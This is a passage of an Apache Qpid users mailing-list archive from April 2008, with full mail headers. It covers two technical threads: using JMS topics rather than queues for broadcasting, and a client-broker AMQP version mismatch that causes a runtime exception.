Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20509 invoked by uid 99); 9 Apr 2008 11:13:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 04:13:37 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.javerdel.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 11:12:54 +0000 Received: from [161.129.204.104] ([acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.129.204.104]) (AUTH: LOGIN intstreamfi_04) by mail.javerdel.com with esmtp; Wed, 09 Apr 2008 14:12:56 +0300 id 0000000000AC8016.0000000047FCA4B8.00003401 Message-ID: <[email protected]> Date: Wed, 09 Apr 2008 14:12:48 +0300 From: "=?ISO-8859-1?Q?Kalle_K=E4rkk=E4inen?=" <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20080213) MIME-Version: 1.0 To: [email protected] Subject: publish to multiple clients Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Hi, I'm giving qpid (java version M1) a serious jab, I'm in the middle of using it to transport various messages from my server to my multiple clients. First, my idea of it. 1) Since broker can have multiple servers installed, and I really like to handle server-side user right management, I'm using random queue names and a service search channel. So servers are listening to 'search' channel. 2) Each server has two channels, 'command' and 'broadcast'. 3) 'command' channel has communication from client to server. Each client has a private reply queue (temporary). 4) 'broadcast' channel is for system wide (server wide) updates. Say, some client sends a message saying that this data needs to be updated to this, he gets an update to his private queue saying update-ok, and new state of data is updated via 'broadcast' queue so that everyone is up-to-speed on the latest developments. Well, this seems to be working poorly. It seems that I'm unable to get a message broadcasted to multiple clients. The private message and all that works very well. I'm constructing the broadcast queue like this: broadcastChannel = session.createQueue(id+"-broadcast"); broadcaster = session.createProducer(broadcastChannel); and sending stuff to it like this: JMSTextMessage msg = session.createTextMessage(); broadcaster.send(msg); I'm using a non-transactional session with client ack. So, what gives? -- Kalle. From [email protected] Wed Apr 09 11:45:53 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40375 invoked from network); 9 Apr 2008 11:45:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Apr 2008 11:45:53 -0000 Received: (qmail 75018 invoked by uid 500); 9 Apr 2008 11:45:53 -0000 Delivered-To: [email protected] Received: (qmail 75003 invoked by uid 500); 9 Apr 2008 11:45:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 74994 invoked by uid 99); 9 Apr 2008 11:45:53 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 04:45:53 -0700 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mx1.redhat.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 11:45:03 +0000 Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [161.129.204.104]) by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m39BjLr3031907 for <[email protected]>; Wed, 9 Apr 2008 07:45:21 -0400 Received: from file.rdu.redhat.com (file.rdu.redhat.com [161.129.204.104]) by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m39BjLkb027311 for <[email protected]>; Wed, 9 Apr 2008 07:45:21 -0400 Received: from [161.129.204.104] (vpn-4-90.str.redhat.com [161.129.204.104]) by file.rdu.redhat.com (8.13.1/8.13.1) with ESMTP id m39BjKMU023478 for <[email protected]>; Wed, 9 Apr 2008 07:45:20 -0400 Message-ID: <[email protected]> Date: Wed, 09 Apr 2008 12:44:45 +0100 From: Gordon Sim <[email protected]> Organization: Registered Address: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SI4 1TE, United Kingdom.,Registered in England and Wales under Company Registration No. 3798903,Directors: Michael Cunningham (USA), Charlie Peters (USA) and David Owens (Ireland) User-Agent: Thunderbird 161.129.204.104 (X11/20060501) MIME-Version: 1.0 To: [email protected] Subject: Re: publish to multiple clients References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Scanned-By: MIMEDefang 2.58 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org Kalle Kärkkäinen wrote: > I'm constructing the broadcast queue like this: > > broadcastChannel = session.createQueue(id+"-broadcast"); > broadcaster = session.createProducer(broadcastChannel); > > and sending stuff to it like this: > > JMSTextMessage msg = session.createTextMessage(); > broadcaster.send(msg); In JMS a 'Queue' is for point-to-point communication. For broadcasting you want to use a 'Topic'; that way the consumers on the topic will each see every message sent. (If you use a queue on the other hand each message will be consumed by only on consumer). From [email protected] Wed Apr 09 13:14:32 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77115 invoked from network); 9 Apr 2008 13:14:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Apr 2008 13:14:32 -0000 Received: (qmail 34549 invoked by uid 500); 9 Apr 2008 13:14:32 -0000 Delivered-To: [email protected] Received: (qmail 34533 invoked by uid 500); 9 Apr 2008 13:14:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34524 invoked by uid 99); 9 Apr 2008 13:14:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 06:14:32 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rn-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 13:13:50 +0000 Received: by rn-out-0910.google.com with SMTP id a43so2718006rne.10 for <[email protected]>; Wed, 09 Apr 2008 06:14:02 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=WbW4BAWxwFA2a2Y6/xQZmrXWVfWeUnw0Sd8NU22Gibs=; b=L2wIvh7NfqimVQM/AdHFlo+8xAJ9UG9YxUgR6keiGfH7EzUvOJuxIm5jGy5vB0qqvOINeHYIZet9hayZ1UJAc/l+ZD67psOk82RthVWVGORjce9tmMhyGqnaBG5fT02a2buLHspzYqT8DRrDNP6376TEBKDRiuLZvzKq4Xbn5b8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=t3H8EKrXeYwxCORCQRDDiwTy6zf+dcR/2jI0T+UE5P4Pj5RaShm0BYsT1sIwBF3hIqh1BEQ2D32xTD1xoefHfk5Ev0LWD4BYOiGiDWQwebATPyzhTSN3iUlP00ncAnvd7CyLJrTkv2xLqOk8sUVuQG5lw2nVs4GRzFdpAq/9y0Q= Received: by 161.129.204.104 with SMTP id v1mr73015waf.204.1207746841798; Wed, 09 Apr 2008 06:14:01 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 9 Apr 2008 06:14:01 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 9 Apr 2008 14:14:01 +0100 From: "Robert Greig" <[email protected]> To: [email protected] Subject: Re: publish to multiple clients In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org On 09/04/2008, Kalle K=E4rkk=E4inen <[email protected]> wrote: > Hi, > > I'm giving qpid (java version M1) a serious jab, I'm in the middle of usi= ng > it to transport various messages from my server to my multiple clients. I would recommend that you use M2. M1 is very very old and you will find that M2 is vastly superior in terms of functionality and reliability. RG From [email protected] Wed Apr 09 13:21:41 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79934 invoked from network); 9 Apr 2008 13:21:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Apr 2008 13:21:41 -0000 Received: (qmail 49885 invoked by uid 500); 9 Apr 2008 13:21:41 -0000 Delivered-To: [email protected] Received: (qmail 49872 invoked by uid 500); 9 Apr 2008 13:21:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49863 invoked by uid 99); 9 Apr 2008 13:21:41 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 06:21:41 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.javerdel.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 13:20:58 +0000 Received: from [161.129.204.104] ([acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.129.204.104]) (AUTH: LOGIN intstreamfi_04) by mail.javerdel.com with esmtp; Wed, 09 Apr 2008 16:21:07 +0300 id 0000000000AC8016.0000000047FCC2C3.000064EC Message-ID: <[email protected]> Date: Wed, 09 Apr 2008 16:20:58 +0300 From: "=?ISO-8859-1?Q?Kalle_K=E4rkk=E4inen?=" <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20080213) MIME-Version: 1.0 To: [email protected] Subject: Re: publish to multiple clients References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Hi, Thanks, Gordon & Robert! I got it working and I'll also move over to newer version. -- Kalle. Robert Greig kirjoitti: > On 09/04/2008, Kalle Kärkkäinen <[email protected]> wrote: >> Hi, >> >> I'm giving qpid (java version M1) a serious jab, I'm in the middle of using >> it to transport various messages from my server to my multiple clients. > > I would recommend that you use M2. M1 is very very old and you will > find that M2 is vastly superior in terms of functionality and > reliability. > > RG From [email protected] Wed Apr 09 13:32:14 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 82873 invoked from network); 9 Apr 2008 13:32:14 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Apr 2008 13:32:14 -0000 Received: (qmail 63236 invoked by uid 500); 9 Apr 2008 13:32:14 -0000 Delivered-To: [email protected] Received: (qmail 63220 invoked by uid 500); 9 Apr 2008 13:32:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63211 invoked by uid 99); 9 Apr 2008 13:32:14 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 06:32:14 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rn-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 13:31:22 +0000 Received: by rn-out-0910.google.com with SMTP id a43so2729941rne.10 for <[email protected]>; Wed, 09 Apr 2008 06:31:36 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; bh=4zMwj0S8qqwsgkZsIJ2VNg3TyRdST4Jdf6b4coX5OGg=; b=OqtIOlNXbSOOtH708Pevqbwz+7+9EoEDbW7mhUK33piRpbCu8q91RNoNqExZTCLUUGRuiVFWkkpcxmq+LmSQOYoNaUf6XUxIwONe3hHabfcXnJzFAm7PB3bTeBj6wLprT00ZM5B2y20hZl30jnWjylcwgWhKVCdGUeLu5M81CT8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=tgpCsIIVEn5KE5oA2H2jSPfwDyhiX316+buSOjnGbXZeIOnYIyZawAJSacWWeCAkgTbQpoJqTdr6pnpNFhmn9eWmRihidNDaEJLOjcicXgyJvJQyuaDDLfbhGBVa9Vu4e1SU5oF3nFsZvyXt2B4gJwCXCUh9ztw5VZJXj9o1bVs= Received: by 161.129.204.104 with SMTP id n6mr134603waf.51.1207747895190; Wed, 09 Apr 2008 06:31:35 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Wed, 9 Apr 2008 06:31:35 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 9 Apr 2008 14:31:35 +0100 From: "Aidan Skinner" <[email protected]> Reply-To: [email protected] Sender: [email protected] To: [email protected] Subject: Re: publish to multiple clients In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Google-Sender-Auth: 66153084a14a05fc X-Virus-Checked: Checked by ClamAV on apache.org On Wed, Apr 9, 2008 at 2:20 PM, Kalle K=E4rkk=E4inen <[email protected]> wrote: > Thanks, Gordon & Robert! I got it working and I'll also move over to new= er > version. Now might be a good time to try out M2.1 RC3, which will hopefullly become final very soon! http://people.apache.org/~aidan/qpid-M2.1-RC3/ - Aidan --=20 aim/y!:aidans42 g:[email protected] http://aidan.skinner.me.uk/ "We belong to nobody and nobody belongs to us. We don't even belong to each other." From [email protected] Wed Apr 09 13:34:12 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 83498 invoked from network); 9 Apr 2008 13:34:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Apr 2008 13:34:12 -0000 Received: (qmail 65698 invoked by uid 500); 9 Apr 2008 13:34:12 -0000 Delivered-To: [email protected] Received: (qmail 65685 invoked by uid 500); 9 Apr 2008 13:34:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65676 invoked by uid 99); 9 Apr 2008 13:34:12 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 06:34:12 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO mail.javerdel.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 09 Apr 2008 13:33:21 +0000 Received: from [161.129.204.104] ([acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b.129.204.104]) (AUTH: LOGIN intstreamfi_04) by mail.javerdel.com with esmtp; Wed, 09 Apr 2008 16:33:40 +0300 id 0000000000AC8011.0000000047FCC5B4.0000260E Message-ID: <[email protected]> Date: Wed, 09 Apr 2008 16:33:31 +0300 From: "=?ISO-8859-1?Q?Kalle_K=E4rkk=E4inen?=" <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20080213) MIME-Version: 1.0 To: [email protected] Subject: Re: publish to multiple clients References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: multipart/mixed; boundary="------------090205030903080607000104" X-Virus-Checked: Checked by ClamAV on apache.org --------------090205030903080607000104 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Right-o! I'll report any findings too! Aidan Skinner kirjoitti: > On Wed, Apr 9, 2008 at 2:20 PM, Kalle Kärkkäinen > <[email protected]> wrote: > >> Thanks, Gordon & Robert! I got it working and I'll also move over to newer >> version. > > Now might be a good time to try out M2.1 RC3, which will hopefullly > become final very soon! > > http://people.apache.org/~aidan/qpid-M2.1-RC3/ > > - Aidan --------------090205030903080607000104-- From [email protected] Sun Apr 20 21:26:30 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84192 invoked from network); 20 Apr 2008 21:26:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Apr 2008 21:26:30 -0000 Received: (qmail 15254 invoked by uid 500); 20 Apr 2008 21:26:31 -0000 Delivered-To: [email protected] Received: (qmail 15237 invoked by uid 500); 20 Apr 2008 21:26:31 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15228 invoked by uid 99); 20 Apr 2008 21:26:31 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 20 Apr 2008 14:26:31 -0700 X-ASF-Spam-Status: No, hits=2.0 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO FPNYEXCBE02.opus-i.corp) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 20 Apr 2008 21:25:48 +0000 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C8A32D.216289FA" Subject: java.lang.RuntimeException: expecting '41', got 'f' Date: Sun, 20 Apr 2008 17:25:58 -0400 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: java.lang.RuntimeException: expecting '41', got 'f' thread-index: AcijLR/+n4O76o7/TDyLk1pH2w3a+A== From: "Shahbaz Chaudhary" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org ------_=_NextPart_001_01C8A32D.216289FA Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Hi, I'm trying to run some example programs for qpid. =20 There server is the RedHat packaged RHMD from their mrg-beta yum repository (which I believe is just the latest version of qpid server), and the client is TopicPublisher (and TopicListener) from Qpid's svn repository (head-I believe it is considered to be the M3 version). =20 All I have done is take org.apache.qpid.example.amqpexample.pubsub.TopicPublisher (and TopicListener), brought it into eclipse, change the package name to reflect my own directory structure and changed =20 con.connect("localhost", 5672, "test", "guest", "guest"); =20 from localhost to my own server. =20 When I run the file, I get the following run time exception: =20 16:58:58,933 [SocketConnectorIoProcessor-0.0] WARN MinaHandler - [/xxx.xxx.xxx.xxx:5672] Unexpected exception from exceptionCaught handler. java.lang.RuntimeException: connection closed at org.apache.qpidity.nclient.Client$1.exception(Client.java:76) at org.apache.qpidity.transport.Connection.exception(Connection.java:115) at org.apache.qpidity.transport.network.Assembler.exception(Assembler.java: 105) at org.apache.qpidity.transport.network.InputHandler.exception(InputHandler .java:250) at org.apache.qpidity.transport.network.mina.MinaHandler.exceptionCaught(Mi naHandler.java:85) at org.apache.mina.common.support.AbstractIoFilterChain$TailFilter.exceptio nCaught(AbstractIoFilterChain.java:695) at org.apache.mina.common.support.AbstractIoFilterChain.callNextExceptionCa ught(AbstractIoFilterChain.java:423) at org.apache.mina.common.support.AbstractIoFilterChain.access$1000(Abstrac tIoFilterChain.java:54) at org.apache.mina.common.support.AbstractIoFilterChain$EntryImpl$1.excepti onCaught(AbstractIoFilterChain.java:794) at org.apache.mina.common.support.AbstractIoFilterChain$HeadFilter.exceptio nCaught(AbstractIoFilterChain.java:611) at org.apache.mina.common.support.AbstractIoFilterChain.callNextExceptionCa ught(AbstractIoFilterChain.java:423) at org.apache.mina.common.support.AbstractIoFilterChain.fireExceptionCaught (AbstractIoFilterChain.java:407) at org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece ived(AbstractIoFilterChain.java:366) at org.apache.mina.common.support.AbstractIoFilterChain.access$1100(Abstrac tIoFilterChain.java:54) at org.apache.mina.common.support.AbstractIoFilterChain$EntryImpl$1.message Received(AbstractIoFilterChain.java:800) at org.apache.mina.common.support.AbstractIoFilterChain$HeadFilter.messageR eceived(AbstractIoFilterChain.java:617) at org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece ived(AbstractIoFilterChain.java:362) at org.apache.mina.common.support.AbstractIoFilterChain.fireMessageReceived (AbstractIoFilterChain.java:353) at org.apache.mina.transport.socket.nio.SocketIoProcessor.read(SocketIoProc essor.java:246) at org.apache.mina.transport.socket.nio.SocketIoProcessor.process(SocketIoP rocessor.java:206) at org.apache.mina.transport.socket.nio.SocketIoProcessor.access$500(Socket IoProcessor.java:44) at org.apache.mina.transport.socket.nio.SocketIoProcessor$Worker.run(Socket IoProcessor.java:506) at org.apache.mina.util.NamePreservingRunnable.run(NamePreservingRunnable.j ava:43) at java.lang.Thread.run(Unknown Source) Caused by: java.lang.RuntimeException: expecting '41', got 'f' at org.apache.qpidity.transport.Channel.error(Channel.java:116) at org.apache.qpidity.transport.Channel.error(Channel.java:41) at org.apache.qpidity.transport.ProtocolError.delegate(ProtocolError.java:5 9) at org.apache.qpidity.transport.Channel.received(Channel.java:72) at org.apache.qpidity.transport.Connection.received(Connection.java:82) at org.apache.qpidity.transport.Connection.received(Connection.java:43) at org.apache.qpidity.transport.network.Assembler.emit(Assembler.java:90) at org.apache.qpidity.transport.network.Assembler.error(Assembler.java:134) at org.apache.qpidity.transport.ProtocolError.delegate(ProtocolError.java:6 4) at org.apache.qpidity.transport.network.Assembler.received(Assembler.java:1 00) at org.apache.qpidity.transport.network.Assembler.received(Assembler.java:4 9) at org.apache.qpidity.transport.network.InputHandler.error(InputHandler.jav a:111) at org.apache.qpidity.transport.network.InputHandler.expect(InputHandler.ja va:243) at org.apache.qpidity.transport.network.InputHandler.expect(InputHandler.ja va:234) at org.apache.qpidity.transport.network.InputHandler.next(InputHandler.java :126) at org.apache.qpidity.transport.network.InputHandler.received(InputHandler. java:118) at org.apache.qpidity.transport.network.InputHandler.received(InputHandler. java:41) at org.apache.qpidity.transport.network.mina.MinaHandler.messageReceived(Mi naHandler.java:74) at org.apache.mina.common.support.AbstractIoFilterChain$TailFilter.messageR eceived(AbstractIoFilterChain.java:703) at org.apache.mina.common.support.AbstractIoFilterChain.callNextMessageRece ived(AbstractIoFilterChain.java:362) ... 11 more =20 Any idea what could be causing this? =20 Thanks =20 -Shahbaz =20 ------_=_NextPart_001_01C8A32D.216289FA-- From [email protected] Mon Apr 21 08:13:59 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51493 invoked from network); 21 Apr 2008 08:13:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Apr 2008 08:13:59 -0000 Received: (qmail 43217 invoked by uid 500); 21 Apr 2008 08:14:00 -0000 Delivered-To: [email protected] Received: (qmail 43195 invoked by uid 500); 21 Apr 2008 08:14:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43186 invoked by uid 99); 21 Apr 2008 08:14:00 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 01:14:00 -0700 X-ASF-Spam-Status: No, hits=-4.0 required=10.0 tests=RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mx1.redhat.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 08:13:17 +0000 Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [161.129.204.104]) by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m3L8DTNP012212 for <[email protected]>; Mon, 21 Apr 2008 04:13:29 -0400 Received: from file.rdu.redhat.com (file.rdu.redhat.com [161.129.204.104]) by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m3L8DS44028930 for <[email protected]>; Mon, 21 Apr 2008 04:13:28 -0400 Received: from [161.129.204.104] (vpn-4-82.str.redhat.com [161.129.204.104]) by file.rdu.redhat.com (8.13.1/8.13.1) with ESMTP id m3L8DR8V011905 for <[email protected]>; Mon, 21 Apr 2008 04:13:28 -0400 Message-ID: <[email protected]> Date: Mon, 21 Apr 2008 09:13:19 +0100 From: Gordon Sim <[email protected]> Organization: Registered Address: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SI4 1TE, United Kingdom.,Registered in England and Wales under Company Registration No. 3798903,Directors: Michael Cunningham (USA), Charlie Peters (USA) and David Owens (Ireland) User-Agent: Thunderbird 161.129.204.104 (X11/20060501) MIME-Version: 1.0 To: [email protected] Subject: Re: java.lang.RuntimeException: expecting '41', got 'f' References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Scanned-By: MIMEDefang 2.58 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org Shahbaz Chaudhary wrote: > Hi, > > I'm trying to run some example programs for qpid. > > > > There server is the RedHat packaged RHMD from their mrg-beta yum > repository (which I believe is just the latest version of qpid server), > and the client is TopicPublisher (and TopicListener) from Qpid's svn > repository (head-I believe it is considered to be the M3 version). It is probably a versioning issue (which I fully accept should be handled a lot better and signaled more clearly). The mrg-beta yum repo contains a version of the broker based on a published preview of the 0-10 AMQP specification. Since then the 0-10 AMQP specification has been finalised and re-published with several changes making it incompatible with the preview of the same 'version'(!). Since the final 0-10 specification was released we have been working to update the code on trunk. If you use the client from trunk, I'd suggest to use a broker from trunk also. Alternatively you can use the upcoming M2.1 release (just being voted through as we speak). (If you want to try out the mrg beta, feel free to do that also but probably best at this stage to use the clients from there as well in that case). > All I have done is take > org.apache.qpid.example.amqpexample.pubsub.TopicPublisher (and > TopicListener), brought it into eclipse, change the package name to > reflect my own directory structure and changed > > > > con.connect("localhost", 5672, "test", "guest", "guest"); > > > > from localhost to my own server. If you specify '-t' to the qpidd when starting the server it will log some debug output to the console which will hopefully give more insight into what is happening. From [email protected] Mon Apr 21 11:14:41 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 19205 invoked from network); 21 Apr 2008 11:14:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Apr 2008 11:14:41 -0000 Received: (qmail 55349 invoked by uid 500); 21 Apr 2008 11:14:41 -0000 Delivered-To: [email protected] Received: (qmail 55336 invoked by uid 500); 21 Apr 2008 11:14:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <qpid-users.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55327 invoked by uid 99); 21 Apr 2008 11:14:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 21 Apr 2008 04:14:40 -0700 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=RCVD_IN_DNSWL_LOW,SPF_NEUTRAL X-Spam-Check-By: apache.org 